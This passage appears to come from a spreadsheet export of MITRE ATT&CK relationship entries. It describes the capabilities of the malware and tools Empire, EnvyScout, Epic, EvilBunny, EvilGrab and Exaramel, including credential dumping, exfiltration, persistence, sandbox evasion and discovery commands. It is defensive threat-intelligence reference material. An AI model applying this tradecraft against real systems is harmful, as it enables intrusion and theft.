    <t>[Empire](https://attack.mitre.org/software/S0363) has modules for enumerating domain trusts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--0cc7cd3a-629e-4f90-9fca-1dde823fa428</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a dylib hijacker module that generates a malicious dylib given the path to a legitimate dylib of a vulnerable application.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--c17d90b5-569c-42db-9265-ac99cad32093</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can send data gathered from a target through the command and control channel.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--39d1a7ed-2388-4611-9886-915a3604c300</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Dropbox for data exfiltration.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--98ec1cf2-91ed-4a5f-b653-1d60259d0b46</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use GitHub for data exfiltration.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--74779612-4c9b-4b23-8138-763f84362f8f</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can exploit vulnerabilities such as MS16-032 and MS16-135.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--4507ba2b-e23c-4acf-a6a3-5ed9dae8d590</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--73fbf268-20d3-4549-9dd2-6e20e18079e0</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules for finding files of interest on hosts and network shares.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--75cc19f5-00b4-43e2-8eae-f633693dbe56</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use golden tickets.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--7367c930-0727-4550-b421-2768edef03cd</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules for enumerating Group Policy.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--563c1b39-f32b-4dfd-b3c1-47fb66ce9eb7</t>
  </si>
  <si>
    <t>11 August 2021</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; to modify a GPO that will install and execute a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053).(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--39266465-987d-46f6-8680-4149a5bfea50</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can upload and download to and from a victim machine.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--efd94521-6d23-4947-a257-1c81ac52f0d9</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) uses [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; to request service tickets and return crackable ticket hashes.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--5f1cf52c-f565-4325-9d4f-4a961c642a0f</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes keylogging capabilities for Windows, Linux, and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--14dcdf1b-6788-429d-a7d0-910e86a2e6d6</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: Github PowerShell Empire)(Citation: GitHub Inveigh)</t>
  </si>
  <si>
    <t>relationship--0537c342-77af-4626-bbe3-9360798a30d5</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--d5edf7fa-6d2b-4af8-a1d3-e0f9fe56eb00</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire local and domain user account information.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--bce07a45-9955-4466-86ad-35fef741087d</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a module for creating a local user if permissions allow.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--187c8a97-3ba1-476e-8377-592adb8e70a3</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to collect emails on a target system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--9c98640e-0307-48bb-aafc-af14a774fd5b</t>
  </si>
  <si>
    <t xml:space="preserve">[Empire](https://attack.mitre.org/software/S0363) can use built-in modules to abuse trusted utilities like MSBuild.exe.(Citation: Github PowerShell Empire)
</t>
  </si>
  <si>
    <t>relationship--8e21def7-2c70-47f8-90f5-0238048ae15f</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains a variety of enumeration modules that have an option to use API calls to carry out tasks.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--8362d7e2-c22a-4bde-99dd-b2d66b4c775a</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can perform port scans from an infected host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--2589342a-8f88-4458-bc34-cec6b073763e</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can find shared drives on the local system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--6fa815b2-23dc-455f-b358-dacb4e30a073</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can be used to conduct packet captures on target hosts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--9be360bb-8ac4-4357-8795-0736b447293c</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can perform pass the hash attacks.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--872c6f1b-aa4f-4d43-b35d-c4216d2f4559</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--7f0f21db-5bb8-465c-9141-d1b5172d0756</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit search order hijacking vulnerabilities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--70386a3a-6ea5-4a2b-9989-2356ee9cf770</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit unquoted path vulnerabilities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--63092968-deca-4af9-bda5-a3e05b4db40f</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</si>
  <si>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</si>
  <si>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relationship--095d2af9-dca4-4a7a-b22e-e37923e7c43c</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use modules like &lt;code&gt;Invoke-SessionGopher&lt;/code&gt; to extract private key and session information.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--9741bd7b-a3f2-4052-b2e0-f0fcf331ceae</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can find information about processes running on local and remote systems.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--ee565652-51c8-4fe8-bb05-682c6942485a</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--85dc96ac-ec8e-4e15-ba4b-807c1a7b46cc</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</si>
  <si>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</si>
  <si>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relationship--6cc7fc62-740a-47c4-988c-bdd9c5880c3f</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can add a SID-History to a user if on a domain controller.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--62785ee1-44c5-4938-a479-3f1546531032</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules for executing commands over SSH as well as in-memory VNC agent injection.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--5daee125-eb83-4529-889e-18de7115f688</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules to interact with the Windows task scheduler.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--c761f444-3c01-44b4-b8e7-8a26746ce115</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) is capable of capturing screenshots on Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--21c130df-4123-4f57-9ea2-9ceac05af597</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate antivirus software on the target.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--b9b28368-527c-4b13-9350-b2cda637e711</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</si>
  <si>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</si>
  <si>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relationship--5b162339-4155-4757-8ec1-11834a613c8a</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use [PsExec](https://attack.mitre.org/software/S0029) to execute a payload on a remote host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--7447ce8c-6c1a-497e-86d5-1adf960e23a3</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can persist by modifying a .LNK file to include a backdoor.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--f26c53f1-b346-4301-9951-22ffd96ee762</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use silver tickets.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--fde62a7a-0ed1-4077-8275-ebb63eecdd2a</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate host system information like OS, architecture, domain name, applied patches, and more.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--3c766e53-1372-4b94-b7de-b3f70d4d1a91</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire network configuration information like DNS servers, public IP, and network proxies used by a host.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--07db5f41-fc53-47e6-ae7b-755a4acc9e62</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate the current network connections of a host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--c45974f5-90b7-4b5b-8123-9961df8ea26d</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate the username on targeted hosts.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>relationship--f62b29cb-b483-41b3-9724-ab7a376dd2c6</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--f082a4e1-b454-4528-9470-a2799215b235</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can capture webcam data on Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--03d08c76-d8ce-435a-bac1-9cb77cdbaa0c</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can conduct command and control over protocols like HTTP and HTTPS.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--9983965f-91b7-492b-9764-ad801af4476a</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules for executing scripts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--ac1cc421-b62d-462a-8d66-bc5de66defa0</t>
  </si>
  <si>
    <t xml:space="preserve">[Empire](https://attack.mitre.org/software/S0363) can use WMI to deliver a payload to a remote host.(Citation: Github PowerShell Empire) </t>
  </si>
  <si>
    <t>relationship--8561e826-0aa8-4711-ab0b-fffb0b03ff13</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can utilize built-in modules to modify service binaries and restore them to their original state.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--eabdbef7-440f-42ca-99b1-a4d08a1c955e</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can collect sensitive NTLM material from a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--4d3467b2-34cd-484d-9526-571311b0160e</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can deobfuscate and write malicious ISO files to disk.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--68896b85-a0ed-4b99-a776-dbdd3092ac07</t>
  </si>
  <si>
    <t>02 August 2021</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can call &lt;code&gt;window.location.pathname&lt;/code&gt; to ensure that embedded files are being executed from the C: drive, and will terminate if they are not.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--27fd8291-3fba-49e9-a2e0-d3a76a584471</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--ee1dd5bc-9d75-4f46-87a1-12fcb7183f32</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--a6006789-f164-4616-9a1f-20fd2b34113f</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can use hidden directories and files to hide malicious executables.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--735f51e0-f357-45a7-8a80-68eef5d4715b</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--6b58b7e3-4588-45a6-9ff4-7f6ead315ac5</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) has been executed through malicious files attached to e-mails.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--2af5de71-33c3-49d2-9f3e-4fd90919e228</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) has used folder icons for malicious files to lure victims into opening them.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--f09c9f4a-345f-4352-aaba-7b0b0a24085c</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can Base64 encode payloads.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--699979b0-6a9a-4482-9656-82c8fb210676</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) has the ability to proxy execution of malicious files with Rundll32.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--4b1cb3cd-5315-487b-8e4b-554b4679d00d</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) has been distributed via spearphishing as an email attachment.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--6813e94f-a123-4898-80c8-59e74c390fe3</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can determine whether the ISO payload was received by a Windows or iOS device.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--055a15db-2f5b-4c61-821e-36de6f83a90b</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can use cmd.exe to execute malicious files on compromised hosts.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--8d3690aa-f2aa-41ba-b0ec-3ecbb24b92ef</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</si>
  <si>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</si>
  <si>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relationship--9076865a-8215-4536-bb31-60ab7fa20af6</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) compresses the collected data with bzip2 before sending it to the C2 server.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--762f22f8-5f47-4c1f-b41b-86984c3e2550</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used valid digital certificates from Sysprint AG to sign its [Epic](https://attack.mitre.org/software/S0091) dropper.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--88ad4d2e-745e-4712-8901-e772dfaf3298</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.(Citation: ESET Recon Snake Nest)</t>
  </si>
  <si>
    <t>relationship--7a1a5bda-170c-44fd-8094-7f78b7f803c9</t>
  </si>
  <si>
    <t>07 May 2019</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) has a command to delete a file from the machine.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--3464b769-7884-4721-8384-1771472f668d</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\Temp directories.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--291e908e-1d2e-4b29-a564-5a33149d1dbb</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) gathers a list of all user accounts, privilege classes, and time of last logon.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--8e876e40-06b7-4830-a281-85c070b6f854</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) gathers information on local group names.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--bc5b2681-d0e9-4ef5-9a90-56358ea34d96</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) heavily obfuscates its code to make analysis more difficult.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--e600fe60-36d1-4053-af2f-13830d95bd14</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /v&lt;/code&gt; command to obtain a list of processes.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--01f98d14-77b9-439f-8b44-920fcaca2b2b</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;rem reg query&lt;/code&gt; command to obtain values from Registry keys.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--014010a2-7bb8-4b11-bef9-c85609b2d94b</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net view&lt;/code&gt; command on the victim’s machine.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--6e576576-bcd8-42ca-aa0a-8e3e24aaeafc</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) searches for anti-malware services running on the victim’s machine and terminates itself if it finds them.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--d2f6e1bf-49ae-48cb-a919-b556f8cd0553</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) encrypts commands from the C2 server using a hardcoded key.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--bcc48bba-95a6-465b-ad37-90e2faee5707</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--66b026b6-af1e-47a6-9c3d-b853e2130b68</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;nbtstat -n&lt;/code&gt; and &lt;code&gt;nbtstat -s&lt;/code&gt; commands on the victim’s machine.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--ce560fcf-cd2d-45c6-9331-f5f0594e5bf5</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net use&lt;/code&gt;, &lt;code&gt;net session&lt;/code&gt;, and &lt;code&gt;netstat&lt;/code&gt; commands to gather information on network connections.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--6cfd90ab-8e17-4b78-9bfb-7792b8f51143</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) collects the user name from the victim’s machine.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--1547f28f-d6b7-43cc-8b89-0eaa524648b8</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /svc&lt;/code&gt; command to list the services on the system.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--d012dd66-fef4-4714-bb00-55d9dd2861a1</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net time&lt;/code&gt; command  to get the system time from the machine and collect the current date and time zone information.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>relationship--16f64842-8ba8-4827-a47f-e7d665f942ae</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses HTTP and HTTPS for C2 communications.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>relationship--062b1f19-2afb-4bdc-908e-99594ff114cf</t>
  </si>
  <si>
    <t>S0396</t>
  </si>
  <si>
    <t>EvilBunny</t>
  </si>
  <si>
    <t>malware--a8a778f5-0035-4870-bb25-53dc05029586</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--66cadf3d-bfb7-4b75-a659-06b3cb1bbd37</t>
  </si>
  <si>
    <t>01 July 2019</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has deleted the initial dropper after running through the environment checks.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--ad3eb54c-0f67-42b8-b4cf-060ab6057b79</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has downloaded additional Lua scripts from the C2.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--0109ee05-c2a9-4dcf-80d1-f859500c97c9</t>
  </si>
  <si>
    <t xml:space="preserve">[EvilBunny](https://attack.mitre.org/software/S0396) has used various API calls as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)	</t>
  </si>
  <si>
    <t>relationship--00ba134e-1833-4dde-bf4e-7ec45271e8a6</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used EnumProcesses() to identify how many process are running in the environment.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--e2753d61-40d9-45b3-884a-a4c63b1da476</t>
  </si>
  <si>
    <t xml:space="preserve">[EvilBunny](https://attack.mitre.org/software/S0396) has created Registry keys for persistence in &lt;code&gt;[HKLM|HKCU]\…\CurrentVersion\Run&lt;/code&gt;.(Citation: Cyphort EvilBunny Dec 2014)	</t>
  </si>
  <si>
    <t>relationship--030958f2-615b-4c80-a1ec-38ed335da413</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has executed commands via scheduled tasks.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--9aebf2b6-7688-4946-a12e-ea1d8e62e158</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has been observed querying installed antivirus software.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--e900ada7-1b3a-442d-aa86-5cd16a3a2c00</t>
  </si>
  <si>
    <t xml:space="preserve">[EvilBunny](https://attack.mitre.org/software/S0396)'s dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.(Citation: Cyphort EvilBunny Dec 2014)	</t>
  </si>
  <si>
    <t>relationship--4ce1ed77-dc5d-42d8-838e-b927dc6d6afb</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used the API calls NtQuerySystemTime, GetSystemTimeAsFileTime, and GetTickCount to gather time metrics as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--0c3f8b3b-a6a3-472c-b792-6f5c7ccfbb24</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used time measurements from 3 different APIs before and after performing sleep operations to check and abort if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--b29637f2-49be-4785-b82b-09661f25c42c</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has executed C2 commands directly via HTTP.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--25e11828-0e27-4eb6-afb6-5c048ae9189b</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has an integrated scripting engine to download and execute Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--8cae93fc-8ba7-462f-a27d-b9b8c289034e</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used WMI to gather information about the system.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>relationship--265686ee-6e90-439f-9966-e40b8472bd06</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture audio from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--5599906d-5be3-420c-9f84-e762d85c2511</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture keystrokes.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--0fec9b91-cd45-493b-b23e-abb3ed2513a0</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) adds a Registry Run key for ctfmon.exe to establish persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--cd1e409b-e981-4c83-a9ea-86705a45f92c</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture screenshots.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--b2b873cd-8618-426e-9cae-9e6755acafad</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture video from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--6782d7bb-5e81-4656-9445-fbd6ae1f2bdb</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--5a832b2f-7aa5-4a11-a06a-5cd22fb7f457</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses crontab for persistence if it does not have root privileges.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--e28ddc1d-83a4-4382-a4dc-e55a60aa399d</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can decrypt its configuration file.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--6f64c3b9-7882-4bcf-9ff2-3dcce03cf632</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can attempt to find a new C2 server if it receives an error.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--73a5da20-5358-4da8-8417-020a7dec52cb</t>
  </si>
  <si>
